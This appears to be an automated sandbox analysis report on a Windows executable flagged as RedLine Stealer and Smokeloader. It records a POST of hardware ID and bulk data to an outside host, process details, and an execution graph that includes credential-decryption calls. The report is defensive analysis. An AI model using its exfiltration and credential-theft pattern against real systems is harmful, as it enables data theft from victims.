                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=c7gcjmuqihtt88e9e2840ubn62; expires=Wed, 14-Aug-2024 13:53:43 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EW%2F%2FQbH0qxWF7xnKqk%2FNJU%2BVn3wHfTOCUHiHHAB6EErLzLoijcfPcfyXdQxifDQEkN0p%2B9vr7D3vwGLSFLf13KPCYdepM3xtLVxU8slPk954XuT5UAzKNfozJEQ5ii5E%2FPpg224k1A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c2289855673c-ATL
                                                  alt-svc: h3=":443"; ma=86400
                                                  2024-04-20 20:07:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 31 2e 31 38 31 2e 35 37 2e 35 32 0d 0a
                                                  Data Ascii: fok 81.181.57.52
                                                  2024-04-20 20:07:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  7192.168.2.449737104.21.15.1984437396C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-04-20 20:07:04 UTC287OUTPOST /api HTTP/1.1
                                                  Connection: Keep-Alive
                                                  Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                  Content-Length: 554814
                                                  Host: strollheavengwu.shop
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 35 34 44 44 31 37 41 31 30 33 44 45 46 46 35 46 35 45 45 36 46 31 43 37 34 32 43 31 43 39 46 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 50 36 4d 6b 30 4d 2d 2d 6b 65 79 0d 0a
                                                  Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"F54DD17A103DEFF5F5EE6F1C742C1C9F--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"P6Mk0M--key
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 38 1e 4e 55 be 7f 1e 01 f5 86 28 0d 85 ef c6 0d 03 9e e4 98 58 ff 9f cb 08 fb 2a 80 26 2e e7 66 5b fc 65 c0 f6 49 3e 3a 8d ad 20 66 ba 40 f7 34 16 88 5d 51 87 95 f2 09 c9 21 be 05 67 9d 05 05 02 a4 89 eb 37 c6 4f c4 09 d0 e6 8b d5 a7 e2 ef 84 db 6d 44 04 1c 0b db cb 30 fa 43 c8 d6 d9 f9 20 ca 38 08 af 0f 4a 3a 82 fc 27 f3 20 38 1b aa 94 c2 1f 69 86 0b f7 03 07 ad 4e 40 ae e6 79 0b 22 d5 37 2e 2d 0a dc f8 b7 e5 e3 80 4b df 58 df bb b4 11 fb 21 a7 77 e8 50 cd fa 8d ab 54 a8 c0 be a2 c3 a4 e4 6a 62 88 eb 64 5a 14 0a ee dd ef 23 62 84 09 45 a6 9d 18 9a 96 83 01 49 fe f1 d4 5c 50 1c ec e8 b2 e6 d0 a0 81 9f 0e 58 3a f8 be 4f 0f 6c 37 96 df 7d 73 6a 74 f0 e2 ee 7e ef 1b 27 7b a5 7b 27 c7 14 ed df 3a 94 54 65 bf b1 a9 28 f8 ef 62 da ec e1 7f 80 56 55 e8 07 6f 41
                                                  Data Ascii: 8NU(X*&.f[eI>: f@4]Q!g7OmD0C 8J:' 8iN@y"7.-KX!wPTjbdZ#bEI\PX:Ol7}sjt~'{{':Te(bVUoA
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 25 ba 30 b5 5a 0a 6f 5b 83 f1 01 c3 b5 54 13 ee f7 8f e3 71 65 a3 93 d3 d3 d1 75 fa 13 4a ce 2a 60 a7 63 04 44 90 db 87 a7 5a 06 12 55 94 14 23 e2 7e bd 3f 71 4c 3e d2 c0 a9 cb 10 e7 77 5c 85 cf 8f 97 af d6 d5 c1 3d 6a 2c fb f5 2e 83 c0 7f 57 cd 7a 5a e0 55 09 0f 8f e6 e7 11 8f 45 f3 0b ad 29 f5 2d 09 ed 6c 92 d3 7e b5 51 fb 28 8e 20 87 12 da 83 33 79 a8 bb 24 5e a9 f2 4a 30 b5 e5 4e 68 ed 9e fc 49 b9 7e fe ef ea 59 93 57 46 7f 9f 8d be 9a 1e b2 8f ef 6e 90 68 1f b5 d9 f0 79 63 34 ec 2f fe 4b b1 76 2a 84 1f fd 93 d9 bd ee 74 c5 ef 51 a6 21 a2 33 4b 34 2b b7 45 56 68 7d 38 f6 d8 10 d4 1d b5 25 f2 74 47 81 4a 3a 4b 79 82 97 2e 92 21 f1 82 1d 2c 9a 2e c6 1c df 9c e5 76 bf e7 e8 b7 9a e0 3d f4 7f ed 30 6d ed a4 3f 28 81 f8 17 65 17 af cf db 8c 44 0a 10 8e 86
                                                  Data Ascii: %0Zo[TqeuJ*`cDZU#~?qL>w\=j,.WzZUE)-l~Q( 3y$^J0NhI~YWFnhyc4/Kv*tQ!3K4+EVh}8%tGJ:Ky.!,.v=0m?(eD
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: fd e9 d9 de 4f 68 98 51 b9 e4 72 60 e3 45 bf 40 4f 66 c5 e7 91 9a 8a 97 ff b0 98 dc fc d8 d3 d5 53 2b 7f 9c 98 d4 e6 73 42 5d 63 3f b7 7e 53 7d 8d dd 6d 5e 71 ae 7d da 9f 49 cd db 0b 1c 85 8b 00 e6 d6 69 e0 78 61 07 cf 4e 9d 5e d9 42 61 96 db b0 04 ab f4 40 1b 87 a3 8e 0f b7 f9 ba fe e8 5e 84 d5 84 dc 64 81 34 90 8d 09 b9 e5 35 0f d1 ed 42 ed 0d 3e a8 e3 67 7a df 90 db 4c 9e 86 5b 68 01 87 8f bf 36 10 1f 61 0a 3c e4 ff bf 23 d0 91 cc 51 08 94 a1 a1 26 03 70 ad 2c 17 11 59 12 91 9a a5 28 70 21 e4 a9 36 df 1a 5d 5c 15 fb ea 95 e2 90 d6 0f 40 d8 43 74 c4 3c c3 12 bf 4c ba 7a 70 03 8b 9f 18 46 a9 a0 40 e2 47 4e 88 4d 84 4d 62 a8 61 93 55 69 10 6d 7c b6 71 c1 d5 80 75 97 ee 7a e3 a6 71 ef 8c e1 5a 1f 31 26 72 30 47 80 7e 46 06 46 13 7c ce ba 70 6b 14 a8 ce e6
                                                  Data Ascii: OhQr`E@OfS+sB]c?~S}m^q}IixaN^Ba@^d45B>gzL[h6a<#Q&p,Y(p!6]\@Ct<LzpF@GNMMbaUim|quzqZ1&r0G~FF|pk
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: da f6 34 c2 3c 5f 46 be 76 01 4c 25 cc 09 79 35 bf c7 8c 65 24 9a da 13 ff 8d 44 a0 a9 a1 62 7b a4 b1 f3 28 4f b4 79 3b ca dc 49 e3 d7 65 fc 4b bf ad f7 20 ba e3 5c 00 ab 0f 41 62 19 01 4c df 74 ba cd 9a 99 dd 79 72 f5 04 e7 9a 01 1e 3f a5 1b fc 55 32 10 cb 83 11 c6 f4 2a 8c a3 19 51 45 dd 46 73 b2 1f ac 19 4d c6 d8 70 a1 46 79 2b f7 4c a7 a4 d1 91 f1 3b 33 43 15 f1 9b 2f 05 28 fc 9c 3b a3 c1 d8 7a 52 ed 75 26 33 e2 ef 41 72 9d 44 a4 71 1d 82 1d 08 93 28 47 5d 22 d2 fa d0 8c b8 72 f5 74 f8 1e df d2 53 3e 15 c9 64 4b fb 8c 04 9c 90 e0 7e 46 c9 9e 5d 3a 5c d2 77 59 d3 1b cf 24 22 0f f3 99 54 fd 58 69 d2 ba b9 9a d9 ba c5 1d d6 a4 83 11 02 af 07 d4 c6 b3 de 70 81 3f 5f c7 9e 44 d6 18 e9 66 25 f0 0a 81 db 13 d0 e2 39 d3 cc 04 d1 d8 e7 0b e7 12 d8 3f be af e1
                                                  Data Ascii: 4<_FvL%y5e$Db{(Oy;IeK \AbLtyr?U2*QEFsMpFy+L;3C/(;zRu&3ArDq(G]"rtS>dK~F]:\wY$"TXip?_Df%9?
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 56 14 38 36 c9 0d 45 ea 7c fd b6 64 99 5e d1 d1 14 cf b9 22 2c fe e3 6f 6e 87 2b f6 0e 1c e4 0f 9d c0 84 fa a3 7e 2c e0 62 b3 ea 4c 68 e6 61 13 21 12 9c f9 27 81 95 5e ac 04 95 6b e3 60 d9 37 bd a2 30 7b b7 0c 6c 88 81 5f 72 b1 eb a3 44 07 db 5e 9d 25 56 d7 77 4b d8 5e 78 e1 c5 d3 ff 1d a6 b9 9e 81 bd c3 25 2d 42 7f 85 d8 89 aa 32 91 54 d8 66 ac 56 94 65 b7 ae 56 fb 0c 65 a8 fb 61 de eb 83 fb b3 cf 5c 40 df 5c 63 9c d9 99 29 72 15 ba 49 55 d7 5c 46 cf a2 97 73 66 6c 8e 92 e9 ac 25 55 da 18 00 6f d1 8c 79 56 1f 29 4d 04 10 f6 88 45 29 71 b3 1b b6 d7 06 ff 5d 97 1c a9 61 76 4e fd 4c 90 3b ee 0c ef 03 0d 2a 3b fb 1d 66 5b 20 0c 38 24 c5 90 6f 80 a9 61 97 b8 c0 03 71 86 1e 22 ed ee 5e df f7 7e 6b f6 6e 13 93 2a c4 de f8 b5 55 49 cb f2 8b 37 59 7a e2 ca ee 99
                                                  Data Ascii: V86E|d^",on+~,bLha!'^k`70{l_rD^%VwK^x%-B2TfVeVea\@\c)rIU\Fsfl%UoyV)ME)q]avNL;*;f[ 8$oaq"^~kn*UI7Yz
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 4d e1 10 76 14 17 35 39 e2 a3 f5 fc e3 58 bc cb 9d c0 6f 47 1e 2d 6d 65 7a 19 ef 13 d9 f0 72 14 50 a8 ee 79 e9 8d 29 1a be 8c c3 23 be ff 4e c7 8e 15 2f 98 93 f8 bf 6e b6 23 ea 80 b4 53 95 d1 cd 6c f3 54 df 27 0e ae fc 93 ba 23 d6 99 07 51 24 08 13 4a 7b ec 91 63 f3 b5 10 98 7d 16 0a 11 e5 b2 94 21 47 e1 de 93 1c ad 73 69 dc 7b 3d e8 98 3e bc cb 45 62 20 ef fd 48 8b b6 4d cd 5a d1 2c 0f b9 92 35 cd cc 11 ea 14 0d 77 91 2c 8e a8 3e 02 2c 46 33 35 50 df b1 bd 7f 69 c3 15 0d 57 71 90 5a 03 36 f6 6a 64 39 64 ed 68 2f 01 78 6a 9c 20 e2 50 08 9e 55 ec 9c 9d 25 32 c9 3a 3c f8 fd 0a a5 72 d7 6d 25 e6 c8 04 cb 52 2c 0b 1b f6 f3 57 ab ff ef 02 5f e6 61 66 49 f1 31 e1 85 cb 31 99 3a 18 e3 f3 64 5f de 59 99 38 43 71 2c 47 1a 7a 3d 12 37 5b 1c 23 ae 3a 10 66 9c a4 ea
                                                  Data Ascii: Mv59XoG-mezrPy)#N/n#SlT'#Q$J{c}!Gsi{=>Eb HMZ,5w,>,F35PiWqZ6jd9dh/xj PU%2:<rm%R,W_afI11:d_Y8Cq,Gz=7[#:f
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: c5 1d ed e8 b6 3f 86 82 41 e0 11 94 e1 b0 b7 f4 52 b1 5c ca 88 cb a9 4d 69 84 e7 b2 73 a6 71 13 fa 14 22 34 12 eb 85 54 a7 ae 66 a7 ee 7a 83 01 2e e7 d7 e5 58 f1 ce 78 f9 e0 ef be b0 36 be 38 e9 9b ef 50 fe b5 a9 0c 96 de 8e bd 2c 22 a3 09 dd 24 ab 88 60 2a f6 1a 24 6c 54 71 08 f7 72 4c f7 f7 8f 44 51 14 46 6f ad 92 2b 8f 73 f4 ea ab b9 29 ff 80 1e 45 48 c3 e8 98 d6 4a f5 b2 87 b5 25 4e 4c 64 58 7d 4a 08 e7 f6 f1 27 17 58 95 0e 4e 1d c9 3d 12 9a 7c e4 e4 f9 7f a7 cd 58 a4 75 d1 1d 76 44 c9 37 b6 d8 b6 59 b9 a8 95 9e d3 50 46 b6 4f e2 ce 8b 4b d3 86 a3 9f ec a0 cf 3c 4f e0 b3 58 30 2f dc 97 7e 0e 68 2d 1c 20 96 20 10 47 79 37 65 fb af a4 0d 60 01 39 1c 3a c7 07 ca ad dc 7f 79 bb 9f 7c 02 3a 8f 70 62 6c d2 22 f2 4f dd f2 20 3a 35 38 fa 65 55 a0 67 08 a7 f2
                                                  Data Ascii: ?AR\Misq"4Tfz.Xx68P,"$`*$lTqrLDQFo+s)EHJ%NLdX}J'XN=|XuvD7YPFOK<OX0/~h- Gy7e`9:y|:pbl"O :58eUg
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 77 be 5b 97 b5 e5 27 aa cd 09 9a 02 40 02 2b 95 ea 9e a7 46 58 d0 d3 33 42 1f bd db a0 3f 74 62 c0 37 fd 49 6b f7 e7 87 f9 66 82 bc 5b f3 f6 9f 8c a8 ff bb 25 26 08 42 7c 16 17 d1 40 1b 7f 05 07 de a2 0b 05 50 c3 64 b2 e4 3f c1 69 da 3e 89 9b c7 6a 2c 8d f9 7d 75 10 0c 18 70 82 9c 23 4b ed 45 d1 03 1c 0a 95 86 b9 92 87 fb a5 46 5c e3 b1 23 aa 74 01 8c 36 cb 33 9a 1a 0c f0 eb 8f 59 63 2b 80 4f c5 7c f0 b8 c8 9b ad b8 7d d3 56 68 5e 3b 1f 3e 33 67 aa e6 c4 a9 cd 67 15 a9 c6 bc 82 63 e2 f7 20 d8 a8 5b 7f fd 8a 83 04 ea 7a c2 04 04 6e 10 70 0d b8 7a e5 a8 90 dd 54 7e 00 e1 a0 15 e2 de d0 9d 5c bb d6 9c 59 b2 8b 8d a9 d3 08 f6 b2 25 de 03 f3 1a 9d 44 48 3a 58 63 8c 4e da 44 14 e0 b6 cf e6 24 d0 05 04 7e 4d d9 14 da d8 da 06 66 ee 8d 2d ff e2 b5 a5 4c ad 47 50
                                                  Data Ascii: w['@+FX3B?tb7Ikf[%&B|@Pd?i>j,}up#KEF\#t63Yc+O|}Vh^;>3ggc [znpzT~\Y%DH:XcND$~Mf-LGP
                                                  2024-04-20 20:07:04 UTC15331OUTData Raw: 3f 45 f3 6f f0 f9 10 d0 b5 d7 d1 84 33 fc d7 24 05 1d e7 f5 69 02 5f ed ff ef a5 37 d6 71 7a 27 33 21 3e 26 b1 6c a7 21 2f f3 ae 9a 97 20 e2 8d 59 f4 58 63 22 60 d8 1d 05 f9 87 67 54 a0 fc 5f 66 4c 77 87 e1 8b 57 bf 88 56 ee bc 59 cc d6 40 40 e4 17 d7 d4 d3 de ac ab f9 e1 8c 84 fc a5 9a 09 97 29 78 a2 b6 89 54 81 56 17 b0 6c dd 11 7a 14 86 61 6a 50 8c 5a a1 29 ce db fd fa 72 91 4a ca 04 80 9d 1c bd e3 fc 8d 21 df d9 81 9e 1e d2 07 5c e7 0f 8c d6 84 f7 dc 16 70 0c 5a 78 35 6f af 42 6c a1 67 79 0c 56 ca 0d 96 dc 75 c9 17 5b 18 08 93 8a f4 6e 56 ee 18 5b 2a d6 a6 47 51 eb 66 3d f2 42 10 ee 05 8c fd b9 3e f6 8a 30 08 f1 9e 9b 95 87 c3 fc a0 d7 9a 49 13 1f f6 a4 c0 a2 8e 9f a8 92 ac d9 be 0a ee 7b c9 20 a7 dd 64 1b 96 c7 08 b4 fe 5c d3 85 e2 3d aa a6 a2 0d 32
                                                  Data Ascii: ?Eo3$i_7qz'3!>&l!/ YXc"`gT_fLwWVY@@)xTVlzajPZ)rJ!\pZx5oBlgyVu[nV[*GQf=B>0I{ d\=2
                                                  2024-04-20 20:07:06 UTC816INHTTP/1.1 200 OK
                                                  Date: Sat, 20 Apr 2024 20:07:06 GMT
                                                  Content-Type: text/html; charset=UTF-8
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  Set-Cookie: PHPSESSID=kqrq6kof1o2al4jevijb4va33l; expires=Wed, 14-Aug-2024 13:53:45 GMT; Max-Age=9999999; path=/
                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                  Pragma: no-cache
                                                  CF-Cache-Status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B06HvQt%2BFKJ%2FvweijJMlu71%2Fe1DMR2%2FIswRjECasdpRTuSgCvEr3XXlumv2Vsw3Xl7viZmEZTXyEGcb5wgdNiKBNQqKjnw4d%2FEBlTS%2Bwfdu%2FWAqY0pqfCJ6sKNXemgizLWn3OKu9gA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8777c22ffcc21833-ATL
                                                  alt-svc: h3=":443"; ma=86400


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:22:06:56
                                                  Start date:20/04/2024
                                                  Path:C:\Users\user\Desktop\LwnI84BBtb.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\LwnI84BBtb.exe"
                                                  Imagebase:0x400000
                                                  File size:406'528 bytes
                                                  MD5 hash:49293C745F0FD48AB2784CAD7CC5A0AC
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1921423684.0000000001A4E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1921662921.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:3
                                                  Start time:22:07:05
                                                  Start date:20/04/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1568
                                                  Imagebase:0xce0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:5
                                                  Start time:22:07:06
                                                  Start date:20/04/2024
                                                  Path:C:\Windows\SysWOW64\WerFault.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7396 -s 1644
                                                  Imagebase:0xce0000
                                                  File size:483'680 bytes
                                                  MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:8.4%
                                                    Dynamic/Decrypted Code Coverage:7.7%
                                                    Signature Coverage:27.9%
                                                    Total number of Nodes:362
                                                    Total number of Limit Nodes:20
                                                    execution_graph 21032 420c42 21037 420c4d 21032->21037 21033 4210dd 21037->21033 21038 435c40 LdrInitializeThunk 21037->21038 21039 43b3b0 21037->21039 21047 43b250 21037->21047 21051 43bdf0 21037->21051 21038->21037 21041 43b3fc 21039->21041 21040 43b45e 21046 43b55e 21040->21046 21062 435aa0 21040->21062 21041->21040 21059 435c40 21041->21059 21044 43b49b 21045 435c40 LdrInitializeThunk 21044->21045 21044->21046 21045->21046 21046->21037 21046->21046 21049 43b270 21047->21049 21048 43b37e 21048->21037 21049->21048 21050 435c40 LdrInitializeThunk 21049->21050 21050->21048 21053 43be10 21051->21053 21052 43bede 21054 435aa0 RtlAllocateHeap 21052->21054 21058 43bfce 21052->21058 21053->21052 21055 435c40 LdrInitializeThunk 21053->21055 21056 43bf1d 21054->21056 21055->21052 21057 435c40 LdrInitializeThunk 21056->21057 21056->21058 21057->21058 21058->21037 21060 435c70 21059->21060 21061 435c6d LdrInitializeThunk 21059->21061 21060->21040 21061->21040 21063 435af6 21062->21063 21064 435b3a RtlAllocateHeap 21062->21064 21063->21064 21064->21044 21065 415ec3 21067 415ec9 21065->21067 21066 415f5e 21067->21066 21068 435c40 LdrInitializeThunk 21067->21068 21068->21066 21069 1a4ee26 21070 1a4ee35 21069->21070 21073 1a4f5c6 21070->21073 21079 1a4f5e1 21073->21079 21074 1a4f5ea CreateToolhelp32Snapshot 21075 1a4f606 Module32First 21074->21075 21074->21079 21076 1a4f615 21075->21076 21078 1a4ee3e 21075->21078 21080 1a4f285 21076->21080 21079->21074 21079->21075 21081 1a4f2b0 21080->21081 21082 1a4f2c1 VirtualAlloc 21081->21082 21083 1a4f2f9 21081->21083 21082->21083 21083->21083 21084 4248c7 21085 4248d5 21084->21085 21085->21085 21086 424d0e GetComputerNameExA 21085->21086 21088 424d80 GetComputerNameExA 21086->21088 21089 424e7a 21088->21089 21090 4327c4 21091 4327c9 21090->21091 21094 43a9f0 21091->21094 21093 4327f3 21095 43aa10 21094->21095 21096 435aa0 RtlAllocateHeap 21095->21096 21098 43aa30 21096->21098 21097 43ab5e 21097->21093 21098->21097 21099 435c40 LdrInitializeThunk 21098->21099 21099->21097 21100 437e48 21101 437e9c LoadLibraryW 21100->21101 21103 419dcc 21104 419de2 21103->21104 21104->21104 21107 415130 21104->21107 21108 415150 21107->21108 21109 435aa0 RtlAllocateHeap 21108->21109 21110 4151c3 21109->21110 21110->21110 21111 43a9f0 2 API calls 21110->21111 21112 41523a 21111->21112 21113 41bfce 21114 43a9f0 2 API calls 21113->21114 21115 41bffe 21114->21115 21116 41aed0 21117 41af20 21116->21117 21118 41aede 21116->21118 21119 435aa0 RtlAllocateHeap 21118->21119 21120 41af34 21119->21120 21120->21120 21122 41afe0 21120->21122 21123 41b05b 21122->21123 21124 435aa0 RtlAllocateHeap 21123->21124 21125 41b0ea 21124->21125 21128 43aba0 21125->21128 21127 41b14d 21129 43abc0 21128->21129 21130 435aa0 RtlAllocateHeap 21129->21130 21131 43abe4 21130->21131 21132 43ad2e 21131->21132 21133 435c40 LdrInitializeThunk 21131->21133 21132->21127 21133->21132 21134 415355 21139 43ae80 21134->21139 21137 43ae80 LdrInitializeThunk 21138 41537a 21137->21138 21140 43aecc 21139->21140 21141 43af3e 21140->21141 21143 435c40 LdrInitializeThunk 21140->21143 21142 41535f 21141->21142 21144 435c40 LdrInitializeThunk 21141->21144 21142->21137 21143->21141 21144->21142 21145 4191d5 21146 419283 21145->21146 21147 415130 2 API calls 21146->21147 21148 4192e3 21147->21148 21149 415130 2 API calls 21148->21149 21150 41942e 21149->21150 21151 415130 2 API calls 21150->21151 21152 4195ef 21151->21152 21153 415130 2 API calls 21152->21153 21154 41976c 21153->21154 21155 4162d6 21156 4162dc 21155->21156 21157 435aa0 RtlAllocateHeap 21156->21157 21159 4163fb 21157->21159 21158 41654d CryptUnprotectData 21159->21158 21160 41cfe0 21161 41d03f 21160->21161 21162 41cfeb 21160->21162 21163 435aa0 RtlAllocateHeap 21162->21163 21164 41d04e 21163->21164 21165 435aa0 RtlAllocateHeap 21164->21165 21165->21161 21169 410565 21172 4098d0 21169->21172 21171 410572 21173 409921 21172->21173 21174 4098e5 21172->21174 21173->21171 21178 433bb0 21174->21178 21176 409995 21177 435aa0 RtlAllocateHeap 21176->21177 21177->21173 21179 433c21 21178->21179 21180 433c66 RtlExpandEnvironmentStrings 21178->21180 21179->21180 21181 42e3ef 21182 42e41e SelectObject 21181->21182 21183 42e4a5 SelectObject 21182->21183 21184 42e4d1 21183->21184 21185 4383ec 21186 43843b 21185->21186 21187 4384ae 21186->21187 21188 435c40 LdrInitializeThunk 21186->21188 21189 435c40 LdrInitializeThunk 21187->21189 21188->21187 21189->21187 21190 4394ec 21191 439567 RtlReAllocateHeap 21190->21191 21192 43953d 21190->21192 21193 439660 21191->21193 21192->21191 21194 408df0 21197 408dfb 21194->21197 21195 408dff 21196 408e57 ExitProcess 21195->21196 21197->21195 21198 408e0c GetStdHandle 21197->21198 21198->21195 21199 438879 21201 4388b3 21199->21201 21200 43891e 21203 435c40 LdrInitializeThunk 21200->21203 21204 4389de 21200->21204 21201->21200 21202 435c40 LdrInitializeThunk 21201->21202 21202->21200 21203->21204 21205 420a01 21206 420b9f 21205->21206 21207 43b250 LdrInitializeThunk 21206->21207 21208 420bea 21207->21208 21209 439580 21210 43960a RtlAllocateHeap 21209->21210 21211 4395c9 21209->21211 21212 439660 21210->21212 21211->21210 21216 417505 21217 417547 21216->21217 21218 415130 2 API calls 21217->21218 21219 41757a 21218->21219 21220 415130 2 API calls 21219->21220 21221 417656 21220->21221 21222 415130 2 API calls 21221->21222 21223 41770e 21222->21223 21224 415130 2 API calls 21223->21224 21225 4177ca 21224->21225 21226 435aa0 RtlAllocateHeap 21225->21226 21227 4178b0 21226->21227 21227->21227 21232 433fa0 21227->21232 21230 415130 2 API calls 21231 417975 21230->21231 21233 43a9f0 2 API calls 21232->21233 21234 433fc2 21233->21234 21237 417964 21234->21237 21238 435aa0 RtlAllocateHeap 21234->21238 21239 4340be 21234->21239 21240 434130 21234->21240 21243 434262 21234->21243 21237->21230 21242 433ff2 21238->21242 21239->21237 21239->21240 21241 435fb0 LdrInitializeThunk 21239->21241 21239->21243 21246 4360f0 LdrInitializeThunk 21240->21246 21247 436200 LdrInitializeThunk 21240->21247 21241->21239 21242->21239 21245 435c40 LdrInitializeThunk 21242->21245 21243->21237 21244 435c40 LdrInitializeThunk 21243->21244 21244->21237 21245->21239 21246->21240 21247->21240 21248 419004 21249 43ae80 LdrInitializeThunk 21248->21249 21250 41902a 21249->21250 21251 433d05 21254 439e90 21251->21254 21253 433d25 GetVolumeInformationW 21255 427c0b 21257 427c10 21255->21257 21256 427d63 SysAllocString 21257->21256 21257->21257 21265 41860c 21266 418616 21265->21266 21267 435aa0 RtlAllocateHeap 21266->21267 21268 418625 RtlExpandEnvironmentStrings 21267->21268 21269 43aba0 2 API calls 21268->21269 21270 41864b 21269->21270 21271 41c80f 21272 41c81f 21271->21272 21276 41cc60 21272->21276 21290 420600 21272->21290 21273 41c88f 21277 41cc76 21276->21277 21285 41cd2b 21276->21285 21278 435aa0 RtlAllocateHeap 21277->21278 21277->21285 21279 41cd87 21278->21279 21280 43a9f0 2 API calls 21279->21280 21281 41cdfd 21280->21281 21282 435aa0 RtlAllocateHeap 21281->21282 21281->21285 21283 41ce0d 21282->21283 21284 43ae80 LdrInitializeThunk 21283->21284 21286 41ce1f 21284->21286 21285->21273 21287 435aa0 RtlAllocateHeap 21286->21287 21289 41ce5f 21286->21289 21287->21289 21288 435c40 LdrInitializeThunk 21288->21285 21289->21285 21289->21288 21291 420619 21290->21291 21293 420794 21290->21293 21292 435aa0 RtlAllocateHeap 21291->21292 21292->21293 21293->21273 21298 415310 21299 435aa0 RtlAllocateHeap 21298->21299 21300 41531a 21299->21300 21301 416813 21302 416822 21301->21302 21303 43aba0 2 API calls 21302->21303 21304 41685d 21303->21304 21308 421090 21309 4210dd 21308->21309 21313 420c70 21308->21313 21310 43b250 LdrInitializeThunk 21310->21313 21311 43bdf0 2 API calls 21311->21313 21312 43b3b0 2 API calls 21312->21313 21313->21309 21313->21310 21313->21311 21313->21312 21314 435c40 LdrInitializeThunk 21313->21314 21314->21313 21315 419b99 21316 419bae 21315->21316 21317 435aa0 RtlAllocateHeap 21316->21317 21318 419d44 21317->21318 21319 43a9f0 2 API calls 21318->21319 21320 419d9e 21319->21320 21321 365003c 21322 3650049 21321->21322 21336 3650e0f SetErrorMode SetErrorMode 21322->21336 21327 3650265 21328 36502ce VirtualProtect 21327->21328 21330 365030b 21328->21330 21329 3650439 VirtualFree 21334 36504be 21329->21334 21335 36505f4 LoadLibraryA 21329->21335 21330->21329 21331 36504e3 LoadLibraryA 21331->21334 21333 36508c7 21334->21331 21334->21335 21335->21333 21337 3650223 21336->21337 21338 3650d90 21337->21338 21339 3650dad 21338->21339 21340 3650dbb GetPEB 21339->21340 21341 3650238 VirtualAlloc 21339->21341 21340->21341 21341->21327 21342 41461b 21343 41462a 21342->21343 21368 41de00 21343->21368 21345 414630 21346 4098d0 RtlExpandEnvironmentStrings RtlAllocateHeap 